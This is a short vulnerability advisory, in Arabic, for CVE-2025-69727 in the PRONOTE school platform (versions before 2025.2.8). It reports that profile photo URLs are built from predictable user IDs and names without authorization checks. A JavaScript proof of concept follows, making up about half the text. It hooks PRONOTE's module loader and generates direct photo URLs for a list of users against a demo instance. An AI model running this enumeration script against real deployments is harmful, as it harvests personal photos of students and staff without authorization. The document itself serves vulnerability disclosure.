
CVE-2025-69727
PRONOTE - 202X.X.X < 2025.2.8
توجد ثغرة في التحكم غير الصحيح في الوصول في INDEX-EDUCATION PRONOTE قبل الإصدار 2025.2.8. تسمح المكونات المتأثرة (composeUrlImgPhotoIndividu) ببناء عناوين URL مباشرة لصور ملفات المستخدمين بناءً على معرفات يمكن التنبؤ بها فقط مثل معرفات المستخدم وأسمائهم. نظرًا لغياب فحوصات التفويض وعدم وجود تحديد للمعدل عند إنشاء هذه العناوين أو الوصول إليها، يمكن لأي جهة غير مصادق عليها أو غير مصرح لها استرداد صور ملفات المستخدمين عن طريق صياغة طلبات تحتوي على معرفات مخمنة أو معروفة.
const arr = [] // List of users
const base = "https://demo.index-education.net/pronote";
IE.fModule({
f: function (exports, require, module, global) {
const ObjetElement = require("ObjetElement");
const AccesApp = global.GApplication;
const comm = AccesApp.communication;
for (const obj of arr) {
const path = comm.composeUrlFichierExterne(
obj.L.replace(/[\s]/gi, "_") + ".jpg",
new ObjetElement.ObjetElement("", obj.N)
);
const url = `${base}/${path}`;
console.log(url);
}
},
fn: "testIEmodule.js",
});